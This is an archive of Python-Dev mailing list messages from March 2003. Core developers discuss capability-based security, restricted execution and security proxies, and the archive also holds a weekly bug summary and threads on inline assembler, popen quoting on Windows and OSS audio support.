> sure that proxies really achieve the goal of information hiding.

If restricted execution were implemented in the same way, then proxies 
and restricted execution would both benefit from this analysis.

> I think another benefit of proxies vs. rexec is that untrusted code can
> still use all of the standard introspection features when dealing with
> objects it creates itself.  Code running in rexec can't use any
> introspective feature, period, because all those features are disabled. 
> With the proxy approach, introspection is only disabled on protected
> objects.

Right - this does seem like a desirable feature.

>>I am going to write this all up into a document which can be used as a 
>>starting point for work to complete this.
> 
> It sounds like a PEP would be the right thing.  It would be nice if the
> PEP could explain the rationale for a secure Python environment and then
> develop (at least) the capability approach to building that
> environment.  Perhaps I could chip in with some explanation of the proxy
> approach.

That would be excellent! I will write a draft as specified in PEP 1.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From skip@manatee.mojam.com  Sun Mar  9 13:00:22 2003
From: skip@manatee.mojam.com (Skip Montanaro)
Date: Sun, 9 Mar 2003 07:00:22 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303091300.h29D0MAE015342@manatee.mojam.com>

Bug/Patch Summary
-----------------

349 open / 3432 total bugs (+7)
124 open / 2011 total patches (+1)

New Bugs
--------

Move modules out of Carbon (2003-03-02)
	http://python.org/sf/696206
PyMac_GetFSRef should accept unicode (2003-03-02)
	http://python.org/sf/696253
Carbon.CF module needs new style classes (2003-03-03)
	http://python.org/sf/696527
Python 2.4: Warn about omitted mutable_flag. (2003-03-03)
	http://python.org/sf/696535
How to make a class iterable using a member generator. (2003-03-03)
	http://python.org/sf/696777
CGIHTTPServer doesn't quote arguments correctly on Windows. (2003-03-03)
	http://python.org/sf/696846
gensuitemodule overhaul (2003-03-04)
	http://python.org/sf/697179
string.strip implementation/doc mismatch (2003-03-04)
	http://python.org/sf/697220
test_posix fails: getlogin (2003-03-04)
	http://python.org/sf/697556
string.atoi function causing TypeError (2003-03-04)
	http://python.org/sf/697591
Mention gmtime in Chapter 6.9 "Time access and conversions" (2003-03-05)
	http://python.org/sf/697983
Move gmtime function from calendar to time module (2003-03-05)
	http://python.org/sf/697985
Clarify timegm documentation (2003-03-05)
	http://python.org/sf/697986
Clarify daylight variable meaning (2003-03-05)
	http://python.org/sf/697988
Clarify mktime semantics (2003-03-05)
	http://python.org/sf/697989
Document strptime limitation (2003-03-05)
	http://python.org/sf/697990
__file__ attribute missing from dynamicly loaded module (2003-03-05)
	http://python.org/sf/698282
urllib2 Request.get_host and proxies (2003-03-05)
	http://python.org/sf/698374
Tk 8.4.2 and Tkinter.py _substitue function (2003-03-05)
	http://python.org/sf/698517
list.index() bhvr change > python2.x (2003-03-06)
	http://python.org/sf/698561
imaplib: parsing INTERNALDATE (2003-03-06)
	http://python.org/sf/698706
Provide "plucker" format docs. (2003-03-06)
	http://python.org/sf/698900
Error using Tkinter embeded in C++ (2003-03-06)
	http://python.org/sf/699068
HTMLParser crash on glued tag attributes (2003-03-06)
	http://python.org/sf/699079
Tutorial uses omitted slice indices before explaining them (2003-03-06)
	http://python.org/sf/699237
builtin type inconsistency (2003-03-07)
	http://python.org/sf/699312
ncurses/curses on solaris (2003-03-07)
	http://python.org/sf/699379
refcount problem involding debugger (2003-03-07)
	http://python.org/sf/699594
MIMEText's c'tor adds unwanted trailing newline to text (2003-03-07)
	http://python.org/sf/699600
Erroneous error message from IDLE (2003-03-07)
	http://python.org/sf/699630
Canvas Widget origin is off-screen (2003-03-07)
	http://python.org/sf/699816
Obscure error message (2003-03-08)
	http://python.org/sf/699934
site.py should ignore trailing CRs in .pth files (2003-03-08)
	http://python.org/sf/700055

New Patches
-----------

allow proxy server authentication with pimp (2003-03-02)
	http://python.org/sf/696392
fix bug #670311: sys.exit and PYTHONINSPECT (2003-03-04)
	http://python.org/sf/697613
optparse unit tests + fixes (2003-03-05)
	http://python.org/sf/697939
optparse OptionGroup docs (2003-03-05)
	http://python.org/sf/697941
docs for hotshot module (2003-03-05)
	http://python.org/sf/698505
ZipFile - support for file decryption (2003-03-06)
	http://python.org/sf/698833

Closed Bugs
-----------

threads within an embedded python interpreter (2000-11-03)
	http://python.org/sf/221327
unreliable file.read() error handling (2002-02-23)
	http://python.org/sf/521782
Flawed fcntl.ioctl implementation. (2002-05-14)
	http://python.org/sf/555817
Get rid of etype struct (2002-08-06)
	http://python.org/sf/591586
email 2.4.3 pkg mail header error (2002-10-16)
	http://python.org/sf/624254
email incompatibility upgrading to 2.2.2 (2002-10-20)
	http://python.org/sf/626119
HeaderParseError: no header value (2002-11-04)
	http://python.org/sf/633550
Optional argument for dict.pop() method (2002-11-17)
	http://python.org/sf/639806
email.Header misparses mixed headers (2002-11-18)
	http://python.org/sf/640110
datetime docs need review, LaTeX (2002-12-16)
	http://python.org/sf/654846
long(3.1415) gives zero on Solaris 8 (2003-02-03)
	http://python.org/sf/679520
Header loses lines, formats strangely (2003-02-03)
	http://python.org/sf/679827
Carbon.CF.CFString should require ASCII (2003-02-07)
	http://python.org/sf/682215
email: preamble must be \n terminated (2003-02-07)
	http://python.org/sf/682504
socket module on solaris (2003-02-11)
	http://python.org/sf/684903
IDE asks for attention when quitting (2003-02-11)
	http://python.org/sf/684975
robotparser only applies first applicable rule (2003-02-20)
	http://python.org/sf/690214
register command not listed in command line help (2003-02-20)
	http://python.org/sf/690389
can't build bsddb for 2.3a2 (2003-02-20)
	http://python.org/sf/690419
LibRef 4.2.1: {m,n} description update (2003-02-23)
	http://python.org/sf/692016
tkinter.createfilehandler dumps core (2003-02-24)
	http://python.org/sf/692416
licence allowed, but doesn't work (2003-02-25)
	http://python.org/sf/693470
Can't multiply str and bool (2003-02-26)
	http://python.org/sf/693955
email.Parser trashes header (2003-02-26)
	http://python.org/sf/693996
os.popen() hangs on {Free,Open}BSD (2003-02-26)
	http://python.org/sf/694062
complex_new does not always respect subtypes (2003-03-01)
	http://python.org/sf/695651

Closed Patches
--------------

More DictMixin (2003-01-14)
	http://python.org/sf/667730
test_pty hanging on hpux11 (2003-01-20)
	http://python.org/sf/671384
Make the default encoding provided on Windows (2003-01-21)
	http://python.org/sf/671666
unicode support for os.listdir() (2003-02-09)
	http://python.org/sf/683592
Allow freeze to exclude implicits (2003-02-11)
	http://python.org/sf/684677
Use datetime in _strptime (2003-02-23)
	http://python.org/sf/691928
fix for bug 639806: default for dict.pop (2003-02-26)
	http://python.org/sf/693753


From mats@laplaza.org  Sat Mar  8 22:31:25 2003
From: mats@laplaza.org (Mats Wichmann)
Date: Sat, 08 Mar 2003 15:31:25 -0700
Subject: [Python-Dev] Re: acceptability of asm in python code?
In-Reply-To: <20030308170008.25630.88365.Mailman@mail.python.org>
Message-ID: <5.1.0.14.1.20030308152850.01ee2328@mail.laplaza.org>

 >
 >In the BINARY_ADD opcode, and in most arithmetic opcodes, there is a line
 >that checks for overflow that looks like this:
 >
 >if ((i^a) < 0 && (i^b) < 0) goto slow_add;
 >
 >I got a small speedup by replacing this with a macro defined thusly:
 >
 >#if defined(_MSC_VER) and defined(_M_IX86)
 >#define IF_OVERFLOW_GOTO(X) __asm { jo X };
 >#else
 >#define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
 >#endif
 >
 >Would this case be an acceptable use of snippets of inline assembler?

I'd personally be more comfortable if we didn't go
down that road; there are compilers that don't support
asm's (e.g. the Intel Linux compilers).


From pedronis@bluewin.ch  Sun Mar  9 19:09:33 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 9 Mar 2003 20:09:33 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
Message-ID: <05a701c2e66f$6c001be0$6d94fea9@newmexico>

From: "Samuele Pedroni" <pedronis@bluewin.ch>
> From: "Jim Fulton" <jim@zope.com>
> > For example, you can't proxy exceptions without
> > breaking exception handling. In Zope, we rely on restricted execution to
> prevent
> > certian kinds of introspection on exceptions and exception classes.  In
Zope,
> we
> > also don't proxy None, because None is usually checked for identity. We
also
> don't
> > proxy strings, and numbers.
> >
> That was a question I was asking myself about proxies: exception handling.
> But I never had the time to play with it to check.
>
> Does that mean that restricted code can get unproxied instances of classic
> classes as caught exceptions?

maybe the question was unclear, but it was serious, what I was asking is
whether some restricted code can do:

try:
  deliberate code to force exception
except Exception,e:
 ...

so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this
can be the case...

then to be (likely) on the safe side, all exception class definitions for
possible e classes: like e.g.

class MyExc(Exception):
    ...


ought to be executed _in restricted mode_, or be "trivial/empty": something
like

class MyExc(Exception):
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)

    def __str__(self):
        return self.message

is already too much rope.

Although it seems not to have the "nice" two-level-of-calls behavior of Bastion
instances, an unproxied instance of MyExc if MyExc was defined outside of
restricted execution, can be used to break out of restricted execution.

regards.


From Jack.Jansen@oratrix.com  Sun Mar  9 21:24:37 2003
From: Jack.Jansen@oratrix.com (Jack Jansen)
Date: Sun, 9 Mar 2003 22:24:37 +0100
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <d6l2alw2.fsf@python.net>
Message-ID: <87C29952-5275-11D7-B151-000A27B19B96@oratrix.com>

On vrijdag, maa 7, 2003, at 22:48 Europe/Amsterdam, Thomas Heller wrote:
> In distutils we had a similar problem. I don't remember the details
> at the moment exactly, but I think enclosing sys.executable in double
> quotes *only* when it contains spaces should do the trick.

But only spaces may not be good enough. What I think we really want is 
a function
that makes any string safe for popen/exec/shell script (or raises an 
exception if it
can't be done?). As this function will have to be platform-specific it 
seems os.path
would be a suitable place for it.

Or would this give a false sense of security to people who write cgi 
scripts
or something and then suddenly get hit by an IFS hack or similar trick?
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        
http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma 
Goldman -


From logi.stix@verizon.net  Sun Mar  9 21:47:10 2003
From: logi.stix@verizon.net (logistix)
Date: Sun, 9 Mar 2003 16:47:10 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <20030308143843.GB1025@unpythonic.net>
Message-ID: <000001c2e685$7114e9b0$20bba8c0@XP>


> -----Original Message-----
> From: python-dev-admin@python.org 
> [mailto:python-dev-admin@python.org] On Behalf Of Jeff Epler
> Sent: Saturday, March 08, 2003 9:39 AM
> To: Tim Peters
> Cc: PythonDev
> Subject: Re: [Python-Dev] test_popen broken on Win2K
> 
> 
> When I tackled this problem for a program of mine, I ended up 
> making sure that I always used the "short filename" form for 
> the program to be executed.  This way, there were no spaces 
> in the filename and no need to quote them.
> 
> However, the function I used to do this comes from 
> win32<something>, so test_popen can't use it.  Nor can Python 
> fix this up for all users of
> os.popen()
> 
> Jeff
> 

Note that there's a policy/reghack that disables short filenames.  This
allegedly improves file IO by up to 25 % and is commonly recommended as
a performance enhancement for domains that only have W2K + servers and
clients.  It's also part of Microsoft's Server lockdown documentation.
I believe the official stance by Microsoft itself is that short
filenames are a legacy feature.


From tim.one@comcast.net  Sun Mar  9 21:53:51 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 09 Mar 2003 16:53:51 -0500
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <000501c2e5f8$c384b6e0$6401a8c0@damien>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEOHEAAB.tim.one@comcast.net>

[damien morton]
> Its arguable which is more obscure, the x86 assembly instruction "jo"
> (jump if overflow), or the xor trickery in C. <wink>

It's not just the assembler, it's also the world of delicate assumptions
about how the compiler interleaves generated C code with the forced inline
assembler, how that affects optimization in general (see Chris Tismer's post
about that), and how brittle that all is.  One example of the latter:  an
idea that resurfaces from time to time is to make Python "short ints" the
platform spelling of a 64-bit int.  The C overflow-checking code wouldn't be
affected by that (part of the reason it's obscure is that it makes no
assumption about the size of a Python int).  With the inline assembler,
though, it would just break -- jo would pick up some accidental setting of
the overflow flag under MSVC, or we'd have to arrange to generate __int64
addition code that set the flag the way the macro expects.  For a little
speedup on the sole operation(s) it targets, it's just not worth the ongoing
puzzles.

BTW, I'm not sure it's possible to buy a PC anymore less than twice as fast
as the one I'm using right now <wink>.

> I take your point, though, about there being no assembly in python now.

There's one place I wish there were:  I wish Jeremy had time to fold in his
bit of assembler to read the Pentium's clock register.  That's a wonderful
facility we can't get at now, and the assembler would be limited to a tiny
and isolated function.


From greg@cosc.canterbury.ac.nz  Sun Mar  9 22:42:44 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 10 Mar 2003 11:42:44 +1300 (NZDT)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>

> E.g. I might have a service configuration registry object.  The object
> behaves roughly like a dictionary.  A certain user may be given
> read-only access to the registry.

Maybe every Python object should have a flag which
can be set to prevent introspection -- like the current
restricted execution mechanism, but on a per-object
basis. Then any object could be used as a capability.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Sun Mar  9 22:52:39 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 10 Mar 2003 11:52:39 +1300 (NZDT)
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net>
Message-ID: <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>

> Those would be quite different functions, then, unless you proposed to have
> Python interpret native shell metacharacters on its own too (e.g., set up
> pipes, do the indicated file redirections, interpolate envars, and fake
> whatever other shell gimmicks people may use).

What we need is a function which does all those things,
but uses some way of specifying them *other* than shell
metacharacters. E.g.

  os.plumb(("sed", "-e", "s/dead/resting/", "parrots"), 
    ("grep", "norwegian"), output = myfile))

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Mon Mar 10 00:10:51 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 19:10:51 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Mon, 10 Mar 2003 11:42:44 +1300."
 <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
Message-ID: <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>

> Maybe every Python object should have a flag which
> can be set to prevent introspection -- like the current
> restricted execution mechanism, but on a per-object
> basis. Then any object could be used as a capability.

I think the capability folks would object to calling it a capability
though. :-)

Two questions:

- Where to store the flag?  It probably would cost 4 bytes per object.

- Which attributes are considered introspective?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 01:08:20 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 20:08:20 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sun, 09 Mar 2003 07:48:31 EST."
 <E18s0EB-0006la-00@localhost>
References: <E18s0EB-0006la-00@localhost>
Message-ID: <200303100108.h2A18KS06619@pcp02138704pcs.reston01.va.comcast.net>

[Zooko]
> > 2.  Mandatory private data (accessible only by the object itself).
> > Normal Python doesn't have mandatory private data.  If I
> > understand correctly, both rexec and proxies (attempt to) provide
> > this.  They also attempt to provide another safety feature: a
> > wrapper around the standard library and builtins that turns off
> > access to dangerous features according to an overridable security
> > policy.

[Zooko, responding to himself]
> Perhaps it is that "restricted execution" is designed to provide
> private data, by disabling certain introspection features, and
> "rexec" and "proxies" are designed to provide the wrapper feature?

Not really.  Restricted execution doesn't provide private data in
general: all instance variables of all user-defined classes are
accessible to restricted code.  However, restricted execution prevents
introspection paths that can lead from a function or bound method to
its globals or object, respectively, thereby effectively turning
functions and bound methods into capabilities.

Security proxies can be used to enforce private data, however.

The "rexec" module is used to wrap the standard library.  Its approach
is the following, implemented by overriding __import__:

- For modules written in Python, it gives the untrusted code a
  separate copy of the module, so that the untrusted code can't mess
  with module globals that might have a meaning to the trusted kernel.

- For extension modules (i.e. modules written in C), it has a list of
  trusted modules, it provides wrappers for some others that only
  allow a safe subset, and all others are completely off limits.

It also wraps open() and a few other built-ins.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 01:10:36 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 20:10:36 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sun, 09 Mar 2003 07:40:23 EST."
 <E18s06J-0006ZD-00@localhost>
References: <E18s06J-0006ZD-00@localhost>
Message-ID: <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>

> 3.  A standard library that follows the Principle of Least
> Privilege.  That is, a library full of tools that you can extend to
> an object in order to empower it to do specific things
> (e.g. __builtin__.abs(), os.times(), ...) without thereby also
> empowering it to do other things (e.g. __builtin__.file(),
> os.system(), ...).  Python doesn't have such a library.
> 
> Now the Principle of Least Privilege approach to making a library
> safe is very different from the "sandbox" approach.  The latter is
> to remove all "dangerous" tools from the toolbox (or in our case, to
> have them dynamically disabled by the "restricted" bit which is
> determined by an overridable policy).  The former is to separate the
> tools so that dangerous ones don't come tied together with common
> ones.  The security policy, then, is expressed by code that grants
> or withholds capabilities (== references) rather than by code that
> toggles the "restricted" bit.

This sounds interesting, but I'm not sure I follow it.  Can you
elaborate by giving a couple of examples?

> Of course, you can start by denying the entire standard library to
> restricted code, and then incrementally refactor the library or wrap
> it in Least-Privilege wrappers.
> 
> Until you have a substantial Least-Privilege-respecting library you
> can't gain the big benefit of capabilities -- code which is capable
> of doing something useful without also being capable of doing harm.
> (You can gain the "sandbox" style of security -- code which is
> incapable of doing anything useful or harmful.)
> 
> This requirement also means that there can be no "ambient authority"
> -- authority that an object receives even if its creator has given
> it no references.

Again, I would perhaps understand this if you gave a specific
example.  Is it like suid in Unix?

> Regards,
> 
> Zooko
> 
> P.S.  I learned this three-part paradigm from Mark Miller whose
> paper with Chip Morningstar and Bill Frantz articulates it in more
> detail:
> 
> http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop

The paper didn't seem immediately relevant, or perhaps it's too
long-winded and I gave up before it touched upon the relevant
stuff. :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward@python.net  Mon Mar 10 02:16:47 2003
From: gward@python.net (Greg Ward)
Date: Sun, 9 Mar 2003 21:16:47 -0500
Subject: [Python-Dev] Where is OSS used?
Message-ID: <20030310021647.GA2378@cthulhu.gerg.ca>

I'm working on docs for ossaudiodev, and I thought I'd ask here before
bugging the OSS people: does anyone know which operating systems use OSS
(Open Sound System) as the standard audio interface?  I know Linux up to
2.4 does, as do some (all?) versions of FreeBSD.

Do any of the other BSD flavours (OpenBSD, NetBSD, ...) use OSS
out-of-the-box?  (If you have access to a FooBSD box, take a look for
/usr/include/*/soundcard.h -- if it looks like this:

"""
#ifndef SOUNDCARD_H
#define SOUNDCARD_H
/*
 * Copyright by Hannu Savolainen 1993-1997
[...]
"""

then it's OSS.)

Anyone know precisely which 2.5.x version of Linux dropped OSS in favour
of ALSA?

Please reply directly to me -- my python-dev subscription is temporarily
disabled because I went on holiday a week ago, and still haven't caught
up with my other email backlog...

Thanks --

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
I just read that 50% of the population has below median IQ!


From thomas@xs4all.net  Mon Mar 10 09:31:24 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 10 Mar 2003 10:31:24 +0100
Subject: [Python-Dev] Where is OSS used?
In-Reply-To: <20030310021647.GA2378@cthulhu.gerg.ca>
References: <20030310021647.GA2378@cthulhu.gerg.ca>
Message-ID: <20030310093124.GM2112@xs4all.nl>

On Sun, Mar 09, 2003 at 09:16:47PM -0500, Greg Ward wrote:
> I'm working on docs for ossaudiodev, and I thought I'd ask here before
> bugging the OSS people: does anyone know which operating systems use OSS
> (Open Sound System) as the standard audio interface?  I know Linux up to
> 2.4 does, as do some (all?) versions of FreeBSD.

I'd say 'recent'. I don't recall when it was added, definately a while back,
but the oldest machine I have (FreeBSD 4.2) has OSS/Free. From googling I
get the impression that it's been there since 3.x, so 'recently' definately
holds. Likewise, googling shows OpenBSD also uses OSS/Free -- the commercial
OSS installation manual tells you to remove references to OSS/Free from the
kernel :)

And there's a boatload of supported platforms in the commercial OSS of
course, see www.opensound.com. But I don't suggest we try and plug OSS :)

> Anyone know precisely which 2.5.x version of Linux dropped OSS in favour
> of ALSA?

OSS wasn't dropped (not yet anyway), ALSA was added. Also, ALSA has an OSS
emulation mode, so I think it's safe to say you need to 'have OSS or ALSA
with OSS API emulation' enabled.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From ping@zesty.ca  Mon Mar 10 10:51:40 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 10 Mar 2003 04:51:40 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>

Ben Laurie wrote:
> BTW, if you would like to explain why you don't think bound methods are
> the way to go on python-dev, I'd love to hear it.

Guido van Rossum wrote:
> Using capabilities, I would have to hand her
> a bunch of capabilities for various methods: __getitem__, has_key,
> get, keys, items, values, and many more.  Using proxies I can simply
> give her a read-only proxy for the object.  So proxies are more
> powerful.

There seems to be a persistent confusion here that i would like
to dispel: a capability is not a single lambda.

Guido's paragraph, above, seems to believe that it is.  In fact,
the pattern he described is a common and powerful way of using
capabilities.  A capability is just an unforgeable object reference.
In a pure capability system, the only thing you can do with a
capability is to call methods on it (or, if you prefer, all you
can do is send messages to it).  Interposing an object to expose
only a subset of another object's API, such as a read-only subset,
is exactly the power capabilities give you.

It seems to me that the "rexec vs. proxy" debate is really about
a very different question: How do we get from Python's currently
promiscuous objects to properly restricted objects?

(Once we have properly restricted objects in either fashion, yes,
definitely, using proxies to restrict access is a great technique.)

If i understand correctly, the "proxy" answer is "we create a
special wrapper object, then the programmer has to individually
wrap any object they want to be secure".  And the "rexec" answer
is "we create an interpreter mode in which all objects are secure".

I think the latter is far better.  To have any sort of real chance
at establishing security, you have to start from a place where
everything is secure, instead of starting from a place where
everything is insecure and you have to individually secure every
single object with its own wrapper.

The eventual ideal is to have a system where all objects are
"pure" objects (i.e. non-introspectable capabilities) by default.
Anyone wanting to do introspection would simply have to obtain
the "introspect" capability from a privileged place (e.g. sys).
For example,

    class Foo:
        pass

    print Foo.__dict__                  # fails

    from sys import introspect
    print introspect(Foo).__dict__      # succeeds

When running the interpreter in secure mode, "introspect"
would just be missing from the sys module (again, ideally
sys.introspect wouldn't exist by default, and a command-line
option would turn it on, but i realize that's far away).

This would have the effect of the "introspectable flag" that
Guido mentioned, but without expending any storage at all,
until you actually needed to introspect something.


-- ?!ng


From ping@zesty.ca  Mon Mar 10 10:55:42 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 10 Mar 2003 04:55:42 -0600 (CST)
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <3E6A31EA.4090609@algroup.co.uk>
Message-ID: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>

On Sat, 8 Mar 2003, Ben Laurie wrote:
> >>c) Wrap or replace some of the existing libraries, certify that others
> >>are "safe"
> >
> > This should only be necessary for (core and 3rd party) extension
> > modules.  The rexec module has a framework for this.
> >
> >>It looks to me like a and b are shared with proxies, and c would be
> >>different, by definition. Is there anything else? Am I on the wrong track?
> >
> > I don't know why you think (c) is different.
>
> Because with proxies you'd wrap with proxies, and with capabilities
> you'd wrap with capabilities. Or do you think there's a way that would
> work for both (which would, of course, be great)?

This doesn't make any sense to me.  The standard libraries would provide
proxy wrappers in either caes.  The rexec vs. proxy issue doesn't enter
into it.

By the way -- to avoid confusion between "proxies used to wrap
unrestricted objects in order to make them into secure objects" and
"proxies used to reduce the interface of an existing secure object",
let's call the first "proxy" (as has been used in the "rexec vs. proxy"
discussion so far), and call the second a "facet" (which is the term
commonly used when capabilities people talk about reducing an interface).
We often talk about providing, say, a "read-only facet" on an object.


-- ?!ng


From ben@algroup.co.uk  Mon Mar 10 11:02:26 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 10 Mar 2003 11:02:26 +0000
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz> <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6C70C2.2010104@algroup.co.uk>

Guido van Rossum wrote:
>>Maybe every Python object should have a flag which
>>can be set to prevent introspection -- like the current
>>restricted execution mechanism, but on a per-object
>>basis. Then any object could be used as a capability.
> 
> 
> I think the capability folks would object to calling it a capability
> though. :-)

No, objects are another way to do it, though it seems to me with 
somewhat less ease - because the most common use of capabilities is to 
restrict the type of access to objects other objects have, so you'd need 
to have multiple objects proxying to the "real" one if you do it at the 
object level.

If we were going to go this route, I'd like the alternative of _also_ 
being able to set the flag on a bound method.

> Two questions:
> 
> - Where to store the flag?  It probably would cost 4 bytes per object.

You can swap space for time by storing it as an attribute, of course.

> - Which attributes are considered introspective?

All of them, except methods.

Of course, this is what my first approximation to capabilities did 
(that's what a "capclass" was).

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From ping@zesty.ca  Mon Mar 10 11:14:24 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 10 Mar 2003 05:14:24 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>

On Sun, 9 Mar 2003, Guido van Rossum wrote:
> - Which attributes are considered introspective?

Here's a preliminary description of the boundary between "introspective"
and "restricted", off the top of my head:

    1.  The only thing you can do with a bound method is to call it
        (bound methods have no attributes except __doc__).

    2.  The following instance attributes are off limits:
        __class__, __dict__, __module__.

That might be a reasonable start.

However, there is still the problem that the established technique
for storing instance-specific state in Python is to use globally-
accessible data attributes instead of a limited scope.  We would
also need to add a safe (private) place for instances to put state.


-- ?!ng


From jim@ZOPE.COM  Mon Mar 10 11:26:35 2003
From: jim@ZOPE.COM (Jim Fulton)
Date: Mon, 10 Mar 2003 06:26:35 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
Message-ID: <3E6C766B.80400@zope.com>

Samuele Pedroni wrote:
> From: "Jim Fulton" <jim@zope.com>
> 
>>For example, you can't proxy exceptions without
>>breaking exception handling. In Zope, we rely on restricted execution to
> 
> prevent
> 
>>certian kinds of introspection on exceptions and exception classes.  In Zope,
> 
> we
> 
>>also don't proxy None, because None is usually checked for identity. We also
> 
> don't
> 
>>proxy strings, and numbers.
>>
> 
> That was a question I was asking myself about proxies: exception handling.
> But I never had the time to play with it to check.
> 
> Does that mean that restricted code can get unproxied instances of classic
> classes as caught exceptions?

Right. What we can (and will do) is intercept the exceptions and proxy the
exception's instance data. So we'll be relying on restricted execution
to protect the exception method meta data and on proxies to protect the
exception data. Of course, we'd prefer to be able to proxy the the
exception instances themselves.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 11:31:16 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 06:31:16 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain> <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com> <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com> <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6C7784.5060103@zope.com>

Guido van Rossum wrote:
> [Jim]
> 
>>You don't need restricted execution to make proxies work.
> 
> 
> Um, I think that's a dangerous mistake, or a confusion in terminology.

All I'm saying is that the proxy mechanism itself doesn't rely on
restricted execution.

> Without restricted execution, untrusted code would have access to
> sys.modules, and from there it would be able to access
> removeAllProxies.

All we need to be able to do is control imports.  It turns out that
to prevent access to sys.modules, we have to replace __builtins__,
which has the side-effect of enabling restricted execution. You
